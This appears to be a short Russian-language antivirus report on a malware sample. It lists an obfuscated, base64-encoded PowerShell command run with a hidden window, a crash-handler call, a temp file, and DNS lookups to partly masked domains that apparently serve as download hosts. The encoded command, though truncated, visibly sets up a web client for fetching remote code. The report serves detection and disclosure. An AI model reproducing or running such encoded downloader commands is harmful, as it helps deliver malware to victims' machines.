Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAFgAXwBRAFUAYwBDAD0AKAAnAGkAJwArACcAbwBjAEEAawBRACcAKQA7ACQASgBVADEAawBBADQARAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVQBBAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\1176138.cvr
- DNS ASK pl#######nslidingdoorrepair.net
- DNS ASK ge###########abetes.eastus.cloudapp.azure.com
- DNS ASK ur######vokat-mogilev.by
- DNS ASK ar##sms.ir
- DNS ASK do###eninja.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAFgAXwBRAFUAYwBDAD0AKAAnAGkAJwArACcAbwBjAEEAawBRACcAKQA7ACQASgBVADEAawBBADQARAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVQBBAE...' (со скрытым окном)